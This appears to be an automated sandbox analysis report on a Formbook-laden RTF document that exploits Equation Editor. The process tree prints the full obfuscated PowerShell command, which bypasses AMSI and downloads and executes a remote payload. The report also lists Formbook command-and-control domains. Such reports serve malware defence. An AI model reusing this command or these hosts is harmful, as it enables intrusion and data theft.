Analysis
-
max time kernel
147s -
max time network
106s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-01-2021 06:45
Static task
static1
Behavioral task
behavioral1
Sample
Req No. 1807164 LP21.doc.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Req No. 1807164 LP21.doc.rtf
Resource
win10v20201028
General
-
Target
Req No. 1807164 LP21.doc.rtf
-
Size
1.5MB
-
MD5
33ce04c3aaff4168b756498f34429eaf
-
SHA1
8d2526c297d691bf04cc1a3b3add8e2303841cdf
-
SHA256
3687f2ed161b33f5c9dba06ac1bc784f15a83c353a594d2cf9724bcb6f9c56ff
-
SHA512
3c641ddd9bdfff484f621d97fb7c4e1196f51cb7e5a0b81b2671351d5511909b811c0b8ac1aefec7180b215280afba889f5c2d7cedb4ecf214b5276d9289dcc7
Malware Config
Extracted
formbook
http://www.raleighblacknursesrock.com/sly/
nature-nectar.com
lavenderbunch.com
itsguapo.com
silabrenda.digital
madelynmason.com
uslawyer911.com
sumarjewelry.com
therefundexperts.com
smartunity.community
jamesdalby.com
7697vip3.com
bytethug.com
f22.info
positivechargerecycling.com
srimps.net
conversica.partners
chezmireillestore.com
ukiyoservices.com
catsdungeon.com
svactionwmdp7955.com
petnosis.com
dorealgood.vote
meganpeasley.com
southafricanbands.com
donatecbb.com
coinlocaly.com
sharbay.net
nehyam.com
niviholdings.com
baielinda.com
secserve.email
primefoodny.com
coppermachines.com
shionoriginal.com
customtiletables.com
carlsondellosa.com
studiofalaise.com
mdtilenh.com
cpointsolutions.com
iteacherpreneur.com
southerngp.com
hf-te27g5.net
laligaproplayer.com
spreadwordsnotcovid.com
propertysolutionspecialist.com
instore.express
livelinecoffee.com
transfigurethis.com
sabeelfund.com
suntour-nb.com
eatonvancewateroakadvisers.info
kakavjesajt.com
zillion-ch.com
indiancoderclub.com
gymlessbakery.com
bclub.info
atqkhmlqi.icu
gatele3s.com
smb-cybersecurity-services.com
pssjzz.com
miniteco.com
yowoit.com
analytics-ocean.com
shivamshield.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 596 952 Powershell.exe -
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1436-24-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral1/memory/1436-25-0x000000000041EBA0-mapping.dmp formbook behavioral1/memory/932-34-0x0000000000080000-0x00000000000AE000-memory.dmp formbook -
Blocklisted process makes network request 4 IoCs
Processes:
Powershell.exeflow pid process 7 596 Powershell.exe 9 596 Powershell.exe 11 596 Powershell.exe 13 596 Powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Powershell.execalc.exeipconfig.exedescription pid process target process PID 596 set thread context of 1436 596 Powershell.exe calc.exe PID 1436 set thread context of 1272 1436 calc.exe Explorer.EXE PID 932 set thread context of 1272 932 ipconfig.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 932 ipconfig.exe -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1632 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes:
Powershell.execalc.exeipconfig.exepid process 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 1436 calc.exe 1436 calc.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
calc.exeipconfig.exepid process 1436 calc.exe 1436 calc.exe 1436 calc.exe 932 ipconfig.exe 932 ipconfig.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
Powershell.execalc.exeipconfig.exedescription pid process Token: SeDebugPrivilege 596 Powershell.exe Token: SeIncreaseQuotaPrivilege 596 Powershell.exe Token: SeSecurityPrivilege 596 Powershell.exe Token: SeTakeOwnershipPrivilege 596 Powershell.exe Token: SeLoadDriverPrivilege 596 Powershell.exe Token: SeSystemProfilePrivilege 596 Powershell.exe Token: SeSystemtimePrivilege 596 Powershell.exe Token: SeProfSingleProcessPrivilege 596 Powershell.exe Token: SeIncBasePriorityPrivilege 596 Powershell.exe Token: SeCreatePagefilePrivilege 596 Powershell.exe Token: SeBackupPrivilege 596 Powershell.exe Token: SeRestorePrivilege 596 Powershell.exe Token: SeShutdownPrivilege 596 Powershell.exe Token: SeDebugPrivilege 596 Powershell.exe Token: SeSystemEnvironmentPrivilege 596 Powershell.exe Token: SeRemoteShutdownPrivilege 596 Powershell.exe Token: SeUndockPrivilege 596 Powershell.exe Token: SeManageVolumePrivilege 596 Powershell.exe Token: 33 596 Powershell.exe Token: 34 596 Powershell.exe Token: 35 596 Powershell.exe Token: SeIncreaseQuotaPrivilege 596 Powershell.exe Token: SeSecurityPrivilege 596 Powershell.exe Token: SeTakeOwnershipPrivilege 596 Powershell.exe Token: SeLoadDriverPrivilege 596 Powershell.exe Token: SeSystemProfilePrivilege 596 Powershell.exe Token: SeSystemtimePrivilege 596 Powershell.exe Token: SeProfSingleProcessPrivilege 596 Powershell.exe Token: SeIncBasePriorityPrivilege 596 Powershell.exe Token: SeCreatePagefilePrivilege 596 Powershell.exe Token: SeBackupPrivilege 596 Powershell.exe Token: SeRestorePrivilege 596 Powershell.exe Token: SeShutdownPrivilege 596 Powershell.exe Token: SeDebugPrivilege 596 Powershell.exe Token: SeSystemEnvironmentPrivilege 596 Powershell.exe Token: SeRemoteShutdownPrivilege 596 Powershell.exe Token: SeUndockPrivilege 596 Powershell.exe Token: SeManageVolumePrivilege 596 Powershell.exe Token: 33 596 Powershell.exe Token: 34 596 Powershell.exe Token: 35 596 Powershell.exe Token: SeDebugPrivilege 1436 calc.exe Token: SeDebugPrivilege 932 ipconfig.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1632 WINWORD.EXE 1632 WINWORD.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EQNEDT32.EXECmD.exePowershell.exeExplorer.EXEipconfig.exedescription pid process target process PID 1720 wrote to memory of 1624 1720 EQNEDT32.EXE CmD.exe PID 1720 wrote to memory of 1624 1720 EQNEDT32.EXE CmD.exe PID 1720 wrote to memory of 1624 1720 EQNEDT32.EXE CmD.exe PID 1720 wrote to memory of 1624 1720 EQNEDT32.EXE CmD.exe PID 1624 wrote to memory of 1780 1624 CmD.exe cscript.exe PID 1624 wrote to memory of 1780 1624 CmD.exe cscript.exe PID 1624 wrote to memory of 1780 1624 CmD.exe cscript.exe PID 1624 wrote to memory of 1780 1624 CmD.exe cscript.exe PID 596 wrote to memory of 1436 596 Powershell.exe calc.exe PID 596 wrote to memory of 1436 596 Powershell.exe calc.exe PID 596 wrote to memory of 1436 596 Powershell.exe calc.exe PID 596 wrote to memory of 1436 596 Powershell.exe calc.exe PID 596 wrote to memory of 1436 596 Powershell.exe calc.exe PID 596 wrote to memory of 1436 596 Powershell.exe calc.exe PID 596 wrote to memory of 1436 596 Powershell.exe calc.exe PID 1272 wrote to memory of 932 1272 Explorer.EXE ipconfig.exe PID 1272 wrote to memory of 932 1272 Explorer.EXE ipconfig.exe PID 1272 wrote to memory of 932 1272 Explorer.EXE ipconfig.exe PID 1272 wrote to memory of 932 1272 Explorer.EXE ipconfig.exe PID 932 wrote to memory of 756 932 ipconfig.exe cmd.exe PID 932 wrote to memory of 756 932 ipconfig.exe cmd.exe PID 932 wrote to memory of 756 932 ipconfig.exe cmd.exe PID 932 wrote to memory of 756 932 ipconfig.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Req No. 1807164 LP21.doc.rtf"2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\SysWOW64\ipconfig.exe"2⤵
- Suspicious use of SetThreadContext
- Gathers network information
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\WINDOWS\syswow64\calc.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exeCmD.exe /C cscript %tmp%\Client.vbs AC2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$800351095838605342800351095838605342800351095838605342=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,49,68,55,56,53,70,50,56,53,67,61,36,49,68,55,56,53,70,50,56,53,67,61,87,114,105,116,101,45,72,111,115,116,32,39,69,67,52,65,65,66,53,56,48,56,50,50,51,69,66,55,50,50,70,57,67,50,48,54,51,69,68,48,53,54,54,54,53,65,65,56,48,65,67,53,54,53,56,70,57,68,48,54,56,49,53,55,50,48,55,53,57,67,51,69,66,52,67,52,66,55,48,54,53,55,50,52,67,51,68,69,70,65,54,51,68,69,66,53,56,70,67,51,70,65,57,68,50,50,49,50,49,54,55,52,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,54,55,54,56,48,65,69,49,54,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,54,55,54,56,48,65,69,49,54,59,36,69,55,68,69,65,56,68,66,48,51,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,69,55,68,69,65,56,68,66,48,51,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,57,56,54,52,53,50,57,52,49,52,56,55,52,55,51,52,55,47,56,48,48,51,53,49,48,57,53,56,51,56,54,48,53,51,52,50,47,115,101,108,108,121,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,69,55,68,69,65,56,68,66,48,51,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,69,55,68,69,65,56,68,66,48,51,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($800351095838605342800351095838605342800351095838605342)|I`E`X1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\calc.exe"{path}"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbsMD5
8441686d35e4c4ffc920c51d345ed325
SHA16cf3b6fc866c57479c0a0cd78c2e1a55e7989b3f
SHA2563d29d2e97327dcd50f03da93eff9bb90a0ec06f56eade454c944b89865e51ff3
SHA5122ab52182eb8af01230dd562662c4b1e8e6e3a45c460d9544d0525feb8f63a3c7f5adf4a5d976ff7f45214f5c03973210b33304f03249613ce968cf3a36c9db0f
-
memory/596-19-0x000000001B6D0000-0x000000001B6D1000-memory.dmpFilesize
4KB
-
memory/596-16-0x0000000002660000-0x0000000002661000-memory.dmpFilesize
4KB
-
memory/596-18-0x0000000002300000-0x0000000002301000-memory.dmpFilesize
4KB
-
memory/596-23-0x000000001C600000-0x000000001C645000-memory.dmpFilesize
276KB
-
memory/596-21-0x000000001ABEA000-0x000000001AC09000-memory.dmpFilesize
124KB
-
memory/596-20-0x000000001AB50000-0x000000001AB51000-memory.dmpFilesize
4KB
-
memory/596-11-0x000007FEFC1C1000-0x000007FEFC1C3000-memory.dmpFilesize
8KB
-
memory/596-12-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmpFilesize
9.9MB
-
memory/596-13-0x00000000023A0000-0x00000000023A1000-memory.dmpFilesize
4KB
-
memory/596-14-0x000000001AC60000-0x000000001AC61000-memory.dmpFilesize
4KB
-
memory/596-15-0x000000001ABE0000-0x000000001ABE2000-memory.dmpFilesize
8KB
-
memory/596-17-0x000000001ABE4000-0x000000001ABE6000-memory.dmpFilesize
8KB
-
memory/756-32-0x0000000000000000-mapping.dmp
-
memory/932-36-0x0000000001E70000-0x0000000001F03000-memory.dmpFilesize
588KB
-
memory/932-35-0x00000000020A0000-0x00000000023A3000-memory.dmpFilesize
3.0MB
-
memory/932-34-0x0000000000080000-0x00000000000AE000-memory.dmpFilesize
184KB
-
memory/932-33-0x00000000009C0000-0x00000000009CA000-memory.dmpFilesize
40KB
-
memory/932-30-0x0000000000000000-mapping.dmp
-
memory/1272-29-0x0000000006480000-0x0000000006611000-memory.dmpFilesize
1.6MB
-
memory/1436-27-0x0000000000A00000-0x0000000000D03000-memory.dmpFilesize
3.0MB
-
memory/1436-28-0x0000000000190000-0x00000000001A4000-memory.dmpFilesize
80KB
-
memory/1436-24-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/1436-25-0x000000000041EBA0-mapping.dmp
-
memory/1576-22-0x000007FEF7B10000-0x000007FEF7D8A000-memory.dmpFilesize
2.5MB
-
memory/1624-6-0x0000000000000000-mapping.dmp
-
memory/1632-3-0x0000000070741000-0x0000000070743000-memory.dmpFilesize
8KB
-
memory/1632-4-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1632-2-0x0000000072CC1000-0x0000000072CC4000-memory.dmpFilesize
12KB
-
memory/1720-5-0x0000000076341000-0x0000000076343000-memory.dmpFilesize
8KB
-
memory/1780-7-0x0000000000000000-mapping.dmp
-
memory/1780-10-0x00000000028D0000-0x00000000028D4000-memory.dmpFilesize
16KB